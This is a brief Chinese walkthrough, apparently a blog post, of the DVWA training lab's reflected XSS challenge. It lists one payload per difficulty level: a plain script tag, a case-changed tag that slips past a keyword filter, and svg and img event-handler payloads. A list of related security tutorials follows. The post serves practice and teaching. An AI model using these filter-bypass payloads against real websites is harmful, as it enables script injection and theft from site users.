一、低级low
简单拿捏
<script>alert(123)</script>
二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>
三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
Wh1teR0se9 小时前
[极客大挑战 2019]Secret File--详细解析网安_秋刀鱼14 小时前
PHP代码审计 --MVC模型开发框架&rce示例假客套16 小时前
vulfocus在线靶场:CVE_2019_16662 速通手册y0ungsheep16 小时前
[第五空间 2021]pklovecloud 详细题解儒道易行16 小时前
【Pikachu】SSRF(Server-Side Request Forgery)服务器端请求伪造实战九尾w16 小时前
phpMyAdmin/PHP反序列化/sqli-labs/upload/pikachu/DVWA--靶场搭建--超详细教程!!!岛屿旅人19 小时前
美国人工智能国家安全备忘录核心解读(下)可涵不会debug20 小时前
【Linux|计算机网络】HTTPS工作原理与安全机制详解.Ayang20 小时前
【vulhub】Apache 多后缀解析漏洞(apache_parsing_vulnerability)云起无垠1 天前
第75期 | GPTSecurity周报